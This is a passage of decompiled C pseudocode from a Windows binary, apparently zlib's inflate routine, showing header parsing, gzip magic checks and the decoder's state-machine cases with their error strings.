                                                                                                                                                              					_t834 =  *((intOrPtr*)(_t841 - 0x28));
                                                                                                                                                              					_t800[0xe] =  *(_t841 - 0xc);
                                                                                                                                                              					if(_t800[0xa] != 0) {
                                                                                                                                                              						L328:
                                                                                                                                                              						_t763 = E01102DCB(_t838,  *(_t838 + 0xc), _t834 -  *((intOrPtr*)(_t838 + 0x10)));
                                                                                                                                                              						if(_t763 == 0) {
                                                                                                                                                              							L331:
                                                                                                                                                              							_t824 = 0;
                                                                                                                                                              							L332:
                                                                                                                                                              							_t765 =  *(_t841 - 0x38) -  *(_t838 + 4);
                                                                                                                                                              							_t835 = _t834 -  *((intOrPtr*)(_t838 + 0x10));
                                                                                                                                                              							 *((intOrPtr*)(_t838 + 8)) =  *((intOrPtr*)(_t838 + 8)) + _t765;
                                                                                                                                                              							 *((intOrPtr*)(_t838 + 0x14)) =  *((intOrPtr*)(_t838 + 0x14)) + _t835;
                                                                                                                                                              							_t800[7] = _t800[7] + _t835;
                                                                                                                                                              							 *(_t841 - 0x38) = _t765;
                                                                                                                                                              							if(_t800[2] != _t824) {
                                                                                                                                                              								if(_t835 != 0) {
                                                                                                                                                              									_push(_t835);
                                                                                                                                                              									_push( *(_t838 + 0xc) - _t835);
                                                                                                                                                              									_push(_t800[6]);
                                                                                                                                                              									if(_t800[4] == _t824) {
                                                                                                                                                              										_t774 = E01102E91();
                                                                                                                                                              									} else {
                                                                                                                                                              										_t774 = E011030C1();
                                                                                                                                                              									}
                                                                                                                                                              									_t800[6] = _t774;
                                                                                                                                                              									_t824 = 0;
                                                                                                                                                              									 *(_t838 + 0x30) = _t774;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							if( *_t800 == 0x13) {
                                                                                                                                                              								L340:
                                                                                                                                                              								_t824 = 0x100;
                                                                                                                                                              								goto L341;
                                                                                                                                                              							} else {
                                                                                                                                                              								L339:
                                                                                                                                                              								if( *_t800 != 0xe) {
                                                                                                                                                              									L341:
                                                                                                                                                              									 *((intOrPtr*)(_t841 + 8)) = 0x80;
                                                                                                                                                              									asm("sbb ecx, ecx");
                                                                                                                                                              									_t767 =  ==  ?  *((void*)(_t841 + 8)) : 0;
                                                                                                                                                              									_t768 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824;
                                                                                                                                                              									_t769 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                                                                              									 *((intOrPtr*)(_t838 + 0x2c)) = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                                                                              									if( *(_t841 - 0x38) != 0) {
                                                                                                                                                              										L343:
                                                                                                                                                              										if( *((intOrPtr*)(_t841 + 0xc)) != 4) {
                                                                                                                                                              											L345:
                                                                                                                                                              											_t770 =  *(_t841 - 0x20);
                                                                                                                                                              											L138:
                                                                                                                                                              											return _t770;
                                                                                                                                                              										}
                                                                                                                                                              										L344:
                                                                                                                                                              										_t771 =  *(_t841 - 0x20);
                                                                                                                                                              										_t811 = 0xfffffffb;
                                                                                                                                                              										_t770 =  ==  ? _t811 : _t771;
                                                                                                                                                              										goto L138;
                                                                                                                                                              									}
                                                                                                                                                              									L342:
                                                                                                                                                              									if(_t835 == 0) {
                                                                                                                                                              										goto L344;
                                                                                                                                                              									}
                                                                                                                                                              									goto L343;
                                                                                                                                                              								}
                                                                                                                                                              								goto L340;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L329:
                                                                                                                                                              						 *_t800 = 0x1e;
                                                                                                                                                              						L330:
                                                                                                                                                              						_push(0xfffffffc);
                                                                                                                                                              						L137:
                                                                                                                                                              						_pop(_t770);
                                                                                                                                                              						goto L138;
                                                                                                                                                              					}
                                                                                                                                                              					L324:
                                                                                                                                                              					if(_t834 ==  *((intOrPtr*)(_t838 + 0x10))) {
                                                                                                                                                              						goto L332;
                                                                                                                                                              					}
                                                                                                                                                              					L325:
                                                                                                                                                              					if( *_t800 >= 0x1d) {
                                                                                                                                                              						goto L332;
                                                                                                                                                              					}
                                                                                                                                                              					L326:
                                                                                                                                                              					if( *_t800 < 0x1a) {
                                                                                                                                                              						goto L328;
                                                                                                                                                              					}
                                                                                                                                                              					L327:
                                                                                                                                                              					if( *((intOrPtr*)(_t841 + 0xc)) == 4) {
                                                                                                                                                              						goto L332;
                                                                                                                                                              					}
                                                                                                                                                              					goto L328;
                                                                                                                                                              					L168:
                                                                                                                                                              					_t805 = _t822 & 0x0000ffff;
                                                                                                                                                              					if(_t805 ==  !_t822 >> 0x10) {
                                                                                                                                                              						L170:
                                                                                                                                                              						_t800[0x10] = _t805;
                                                                                                                                                              						_t822 = 0;
                                                                                                                                                              						_t806 =  *(_t841 - 4);
                                                                                                                                                              						_t833 = 0;
                                                                                                                                                              						 *(_t841 - 0xc) = 0;
                                                                                                                                                              						 *(_t841 - 0x10) = 0;
                                                                                                                                                              						 *_t800 = 0xe;
                                                                                                                                                              						if( *((intOrPtr*)(_t841 + 0xc)) == 6) {
                                                                                                                                                              							goto L323;
                                                                                                                                                              						}
                                                                                                                                                              						L171:
                                                                                                                                                              						 *_t800 = 0xf;
                                                                                                                                                              						L172:
                                                                                                                                                              						_t775 = _t800[0x10];
                                                                                                                                                              						if(_t775 == 0) {
                                                                                                                                                              							L175:
                                                                                                                                                              							 *_t800 = 0xb;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L135:
                                                                                                                                                              								_t753 =  *_t800;
                                                                                                                                                              								if(_t753 > 0x1e) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								L1:
                                                                                                                                                              								switch( *((intOrPtr*)(_t753 * 4 +  &M01102B54))) {
                                                                                                                                                              									case 0:
                                                                                                                                                              										L2:
                                                                                                                                                              										if(_t800[2] != 0) {
                                                                                                                                                              											L4:
                                                                                                                                                              											_push(0x10);
                                                                                                                                                              											_pop(_t776);
                                                                                                                                                              											__eflags = _t833 - _t776;
                                                                                                                                                              											if(_t833 >= _t776) {
                                                                                                                                                              												L8:
                                                                                                                                                              												__eflags = _t800[2] & 0x00000002;
                                                                                                                                                              												if((_t800[2] & 0x00000002) == 0) {
                                                                                                                                                              													L11:
                                                                                                                                                              													_t800[4] = _t800[4] & 0x00000000;
                                                                                                                                                              													_t777 = _t800[8];
                                                                                                                                                              													__eflags = _t777;
                                                                                                                                                              													if(_t777 != 0) {
                                                                                                                                                              														_t27 = _t777 + 0x30;
                                                                                                                                                              														 *_t27 =  *(_t777 + 0x30) | 0xffffffff;
                                                                                                                                                              														__eflags =  *_t27;
                                                                                                                                                              													}
                                                                                                                                                              													L13:
                                                                                                                                                              													__eflags = _t800[2] & 0x00000001;
                                                                                                                                                              													if((_t800[2] & 0x00000001) == 0) {
                                                                                                                                                              														L24:
                                                                                                                                                              														 *(_t837 + 0x18) = "incorrect header check";
                                                                                                                                                              														goto L17;
                                                                                                                                                              													}
                                                                                                                                                              													L14:
                                                                                                                                                              													_t780 = (_t822 >> 8) + ((_t822 & 0x000000ff) << 8);
                                                                                                                                                              													_push(0x1f);
                                                                                                                                                              													_pop(_t814);
                                                                                                                                                              													__eflags = _t780 % _t814;
                                                                                                                                                              													_t822 =  *(_t841 - 0xc);
                                                                                                                                                              													if(_t780 % _t814 != 0) {
                                                                                                                                                              														goto L24;
                                                                                                                                                              													}
                                                                                                                                                              													L15:
                                                                                                                                                              													__eflags = (_t822 & 0x0000000f) - 8;
                                                                                                                                                              													if((_t822 & 0x0000000f) == 8) {
                                                                                                                                                              														L18:
                                                                                                                                                              														_t822 = _t822 >> 4;
                                                                                                                                                              														_t833 = _t833 - 4;
                                                                                                                                                              														 *(_t841 - 0xc) = _t822;
                                                                                                                                                              														 *(_t841 - 0x10) = _t833;
                                                                                                                                                              														_t817 = (_t822 & 0x0000000f) + 8;
                                                                                                                                                              														__eflags = _t800[9];
                                                                                                                                                              														if(_t800[9] != 0) {
                                                                                                                                                              															L22:
                                                                                                                                                              															__eflags = _t817 - _t800[9];
                                                                                                                                                              															if(_t817 <= _t800[9]) {
                                                                                                                                                              																goto L20;
                                                                                                                                                              															} else {
                                                                                                                                                              																 *(_t837 + 0x18) = "invalid window size";
                                                                                                                                                              																goto L17;
                                                                                                                                                              															}
                                                                                                                                                              														} else {
                                                                                                                                                              															_t800[9] = _t817;
                                                                                                                                                              															L20:
                                                                                                                                                              															_t833 = 0;
                                                                                                                                                              															_t800[5] = 1 << _t817;
                                                                                                                                                              															_t787 = E01102E91(0, 0, 0);
                                                                                                                                                              															_t800[6] = _t787;
                                                                                                                                                              															 *(_t837 + 0x30) = _t787;
                                                                                                                                                              															_t831 =  !( *(_t841 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                              															__eflags = _t831;
                                                                                                                                                              															 *_t800 = _t831;
                                                                                                                                                              															_t822 = 0;
                                                                                                                                                              															goto L21;
                                                                                                                                                              														}
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(_t837 + 0x18) = "unknown compression method";
                                                                                                                                                              														goto L17;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												L9:
                                                                                                                                                              												__eflags = _t822 - 0x8b1f;
                                                                                                                                                              												if(_t822 != 0x8b1f) {
                                                                                                                                                              													goto L11;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t833 = 0;
                                                                                                                                                              													_t800[6] = E011030C1(0, 0, 0);
                                                                                                                                                              													_push(0x1f);
                                                                                                                                                              													_pop(_t789);
                                                                                                                                                              													 *((char*)(_t841 - 0x14)) = _t789;
                                                                                                                                                              													 *((char*)(_t841 - 0x13)) = 0x8b;
                                                                                                                                                              													_t791 = E011030C1(_t800[6], _t841 - 0x14, 2);
                                                                                                                                                              													_t822 = 0;
                                                                                                                                                              													_t800[6] = _t791;
                                                                                                                                                              													 *(_t841 - 0xc) = 0;
                                                                                                                                                              													 *(_t841 - 0x10) = 0;
                                                                                                                                                              													 *_t800 = 1;
                                                                                                                                                              													goto L134;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												_t6 = _t841 - 8; // 0x38
                                                                                                                                                              												_t792 =  *_t6;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L6:
                                                                                                                                                              													__eflags = _t806;
                                                                                                                                                              													if(_t806 == 0) {
                                                                                                                                                              														goto L322;
                                                                                                                                                              													}
                                                                                                                                                              													L7:
                                                                                                                                                              													 *(_t841 - 4) = _t806 - 1;
                                                                                                                                                              													_t794 = ( *_t792 & 0x000000ff) << _t833;
                                                                                                                                                              													_t833 = _t833 + 8;
                                                                                                                                                              													_t806 =  *(_t841 - 4);
                                                                                                                                                              													_t822 = _t822 + _t794;
                                                                                                                                                              													_t9 = _t841 - 8; // 0x38
                                                                                                                                                              													_t792 =  *_t9 + 1;
                                                                                                                                                              													 *(_t841 - 0xc) = _t822;
                                                                                                                                                              													 *(_t841 - 8) = _t792;
                                                                                                                                                              													 *(_t841 - 0x10) = _t833;
                                                                                                                                                              													__eflags = _t833 - 0x10;
                                                                                                                                                              													if(_t833 < 0x10) {
                                                                                                                                                              														continue;
                                                                                                                                                              													}
                                                                                                                                                              													goto L8;
                                                                                                                                                              												}
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											 *_t800 = 0xc;
                                                                                                                                                              											goto L135;
                                                                                                                                                              										}
                                                                                                                                                              									case 1:
                                                                                                                                                              										L25:
                                                                                                                                                              										_push(0x10);
                                                                                                                                                              										_pop(__eax);
                                                                                                                                                              										__eflags = __edi - __eax;
                                                                                                                                                              										if(__edi >= __eax) {
                                                                                                                                                              											L29:
                                                                                                                                                              											 *(__ebx + 0x10) = __edx;
                                                                                                                                                              											__eflags = __dl - 8;
                                                                                                                                                              											if(__dl == 8) {
                                                                                                                                                              												L32:
                                                                                                                                                              												__eflags = __edx & 0x0000e000;
                                                                                                                                                              												if((__edx & 0x0000e000) == 0) {
                                                                                                                                                              													L34:
                                                                                                                                                              													__ecx =  *(__ebx + 0x20);
                                                                                                                                                              													__eflags = __ecx;
                                                                                                                                                              													if(__ecx != 0) {
                                                                                                                                                              														__edx = __edx >> 8;
                                                                                                                                                              														__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														 *__ecx = __eax;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              													if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              														 *(__ebp - 0x14) = __dl;
                                                                                                                                                              														__eax = __ebp - 0x14;
                                                                                                                                                              														__eflags = __edx;
                                                                                                                                                              														 *(__ebp - 0x13) = __dl;
                                                                                                                                                              														 *(__ebx + 0x18) = E011030C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                              													}
                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                              													__eax = 0;
                                                                                                                                                              													__eflags = 0;
                                                                                                                                                              													__edx = 0;
                                                                                                                                                              													 *__ebx = 2;
                                                                                                                                                              													 *(__ebp - 0xc) = 0;
                                                                                                                                                              													__edi = 0;
                                                                                                                                                              													goto L39;
                                                                                                                                                              												}
                                                                                                                                                              												L33:
                                                                                                                                                              												 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                              											}
                                                                                                                                                              											goto L31;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t51 = __ebp - 8; // 0x38
                                                                                                                                                              											__eax =  *_t51;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L27:
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												if(__ecx == 0) {
                                                                                                                                                              													goto L322;
                                                                                                                                                              												}
                                                                                                                                                              												L28:
                                                                                                                                                              												__eax =  *__eax & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 4) = __ecx;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												__eax = __eax << __cl;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__edx = __eax + __edx;
                                                                                                                                                              												_t54 = __ebp - 8; // 0x38
                                                                                                                                                              												__eax =  *_t54;
                                                                                                                                                              												__eax =  *_t54 + 1;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												 *(__ebp - 8) = __eax;
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												__eflags = __edi - 0x10;
                                                                                                                                                              												if(__edi < 0x10) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												goto L29;
                                                                                                                                                              											}
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              									case 2:
                                                                                                                                                              										L39:
                                                                                                                                                              										__eflags = __edi - 0x20;
                                                                                                                                                              										if(__edi >= 0x20) {
                                                                                                                                                              											L43:
                                                                                                                                                              											__eax =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												 *(__eax + 4) = __edx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              												__eax = __edx;
                                                                                                                                                              												 *(__ebp - 0x14) = __dl;
                                                                                                                                                              												__eax = __edx >> 8;
                                                                                                                                                              												 *(__ebp - 0x13) = __al;
                                                                                                                                                              												__edx = __edx >> 0x10;
                                                                                                                                                              												 *(__ebp - 0x12) = __al;
                                                                                                                                                              												__eax = __ebp - 0x14;
                                                                                                                                                              												__eflags = __edx;
                                                                                                                                                              												 *(__ebp - 0x11) = __dl;
                                                                                                                                                              												 *(__ebx + 0x18) = E011030C1( *(__ebx + 0x18), __ebp - 0x14, 4);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											 *__ebx = 3;
                                                                                                                                                              											 *(__ebp - 0xc) = 0;
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											goto L48;
                                                                                                                                                              										}
                                                                                                                                                              										L40:
                                                                                                                                                              										_t74 = __ebp - 8; // 0x38
                                                                                                                                                              										__eax =  *_t74;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L41:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L42:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											_t77 = __ebp - 8; // 0x38
                                                                                                                                                              											__eax =  *_t77;
                                                                                                                                                              											__eax =  *_t77 + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - 0x20;
                                                                                                                                                              											if(__edi < 0x20) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L43;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 3:
                                                                                                                                                              										L48:
                                                                                                                                                              										_push(0x10);
                                                                                                                                                              										_pop(__eax);
                                                                                                                                                              										__eflags = __edi - __eax;
                                                                                                                                                              										if(__edi >= __eax) {
                                                                                                                                                              											L52:
                                                                                                                                                              											__ecx =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx != 0) {
                                                                                                                                                              												__eax = __dl & 0x000000ff;
                                                                                                                                                              												 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                              												__ecx = __edx;
                                                                                                                                                              												__eax =  *(__ebx + 0x20);
                                                                                                                                                              												__ecx = __edx >> 8;
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              												 *(__ebp - 0x14) = __dl;
                                                                                                                                                              												__eax = __ebp - 0x14;
                                                                                                                                                              												__eflags = __edx;
                                                                                                                                                              												 *(__ebp - 0x13) = __dl;
                                                                                                                                                              												 *(__ebx + 0x18) = E011030C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											 *__ebx = 4;
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											 *(__ebp - 0xc) = 0;
                                                                                                                                                              											 *(__ebp - 0x10) = 0;
                                                                                                                                                              											goto L57;
                                                                                                                                                              										}
                                                                                                                                                              										L49:
                                                                                                                                                              										_t94 = __ebp - 8; // 0x38
                                                                                                                                                              										__eax =  *_t94;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L50:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L51:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											_t97 = __ebp - 8; // 0x38
                                                                                                                                                              											__eax =  *_t97;
                                                                                                                                                              											__eax =  *_t97 + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - 0x10;
                                                                                                                                                              											if(__edi < 0x10) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L52;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 4:
                                                                                                                                                              										L57:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                              											L67:
                                                                                                                                                              											__eax =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												_t138 = __eax + 0x10;
                                                                                                                                                              												 *_t138 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                              												__eflags =  *_t138;
                                                                                                                                                              											}
                                                                                                                                                              											L69:
                                                                                                                                                              											 *__ebx = 5;
                                                                                                                                                              											goto L70;
                                                                                                                                                              										}
                                                                                                                                                              										L58:
                                                                                                                                                              										_push(0x10);
                                                                                                                                                              										_pop(__eax);
                                                                                                                                                              										__eflags = __edi - __eax;
                                                                                                                                                              										if(__edi >= __eax) {
                                                                                                                                                              											L62:
                                                                                                                                                              											__eax =  *(__ebx + 0x20);
                                                                                                                                                              											 *(__ebx + 0x40) = __edx;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												 *(__eax + 0x14) = __edx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              												 *(__ebp - 0x14) = __dl;
                                                                                                                                                              												__eax = __ebp - 0x14;
                                                                                                                                                              												__eflags = __edx;
                                                                                                                                                              												 *(__ebp - 0x13) = __dl;
                                                                                                                                                              												 *(__ebx + 0x18) = E011030C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                              											}
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											 *(__ebp - 0xc) = 0;
                                                                                                                                                              											 *(__ebp - 0x10) = 0;
                                                                                                                                                              											goto L69;
                                                                                                                                                              										}
                                                                                                                                                              										L59:
                                                                                                                                                              										_t118 = __ebp - 8; // 0x38
                                                                                                                                                              										__eax =  *_t118;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L60:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L61:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											_t121 = __ebp - 8; // 0x38
                                                                                                                                                              											__eax =  *_t121;
                                                                                                                                                              											__eax =  *_t121 + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - 0x10;
                                                                                                                                                              											if(__edi < 0x10) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L62;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 5:
                                                                                                                                                              										L70:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                              											L83:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											L84:
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											 *(__ebx + 0x40) = __edx;
                                                                                                                                                              											 *__ebx = 6;
                                                                                                                                                              											goto L86;
                                                                                                                                                              										}
                                                                                                                                                              										L71:
                                                                                                                                                              										__ecx =  *(__ebx + 0x40);
                                                                                                                                                              										__edx =  *(__ebp - 4);
                                                                                                                                                              										__eflags = __ecx - __edx;
                                                                                                                                                              										__ecx =  >  ? __edx : __ecx;
                                                                                                                                                              										 *(__ebp - 0x30) = __ecx;
                                                                                                                                                              										__eflags = __ecx;
                                                                                                                                                              										if(__ecx != 0) {
                                                                                                                                                              											__edx =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __edx;
                                                                                                                                                              											if(__edx != 0) {
                                                                                                                                                              												__eax =  *(__edx + 0x10);
                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax != 0) {
                                                                                                                                                              													__eax =  *(__edx + 0x14);
                                                                                                                                                              													__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                                                                              													__edx =  *(__edx + 0x18);
                                                                                                                                                              													 *(__ebp - 0x34) = __eax;
                                                                                                                                                              													__eflags = __eax - __edx;
                                                                                                                                                              													__eax =  *(__ebp - 0x34);
                                                                                                                                                              													if(__eflags <= 0) {
                                                                                                                                                              														__edx = __ecx;
                                                                                                                                                              													} else {
                                                                                                                                                              														__edx = __edx - __eax;
                                                                                                                                                              													}
                                                                                                                                                              													_t154 = __ebp - 8; // 0x38
                                                                                                                                                              													__ecx =  *_t154;
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													__eax = memcpy(__eax,  *_t154, __edx);
                                                                                                                                                              													__ecx =  *(__ebp - 0x30);
                                                                                                                                                              													__esp = __esp + 0xc;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              												_t160 = __ebp - 8; // 0x38
                                                                                                                                                              												 *(__ebx + 0x18) = E011030C1( *(__ebx + 0x18),  *_t160, __ecx);
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                              											 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                                                                              											 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                              											_t168 = __ebx + 0x40;
                                                                                                                                                              											 *_t168 =  *(__ebx + 0x40) - __eax;
                                                                                                                                                              											__eflags =  *_t168;
                                                                                                                                                              										}
                                                                                                                                                              										__edx = 0;
                                                                                                                                                              										__eflags =  *(__ebx + 0x40);
                                                                                                                                                              										if( *(__ebx + 0x40) != 0) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										} else {
                                                                                                                                                              											L82:
                                                                                                                                                              											goto L84;
                                                                                                                                                              										}
                                                                                                                                                              									case 6:
                                                                                                                                                              										L85:
                                                                                                                                                              										__edx = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              										L86:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                                                                              											L100:
                                                                                                                                                              											__eax =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												 *(__eax + 0x1c) = __edx;
                                                                                                                                                              											}
                                                                                                                                                              											L102:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											 *__ebx = 7;
                                                                                                                                                              											 *(__ebx + 0x40) = 0;
                                                                                                                                                              											goto L104;
                                                                                                                                                              										}
                                                                                                                                                              										L87:
                                                                                                                                                              										__eflags = __ecx;
                                                                                                                                                              										if(__ecx == 0) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L88:
                                                                                                                                                              										__esi =  *(__ebp - 4);
                                                                                                                                                              										__eax = __edx;
                                                                                                                                                              										_t177 = __ebp - 8; // 0x38
                                                                                                                                                              										__edx =  *_t177;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L89:
                                                                                                                                                              											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                              											__ecx =  *(__ebx + 0x20);
                                                                                                                                                              											 *(__ebp - 0x34) = __eax;
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx != 0) {
                                                                                                                                                              												__edx =  *(0x1c + __ecx);
                                                                                                                                                              												__eflags =  *(0x1c + __ecx);
                                                                                                                                                              												if( *(0x1c + __ecx) != 0) {
                                                                                                                                                              													__edx =  *(__ebx + 0x40);
                                                                                                                                                              													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                              													if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                              														__ecx =  *(0x1c + __ecx);
                                                                                                                                                              														__eax =  *(__ebp - 0x2c);
                                                                                                                                                              														 *(__ecx + __edx) = __al;
                                                                                                                                                              														_t188 = __ebx + 0x40;
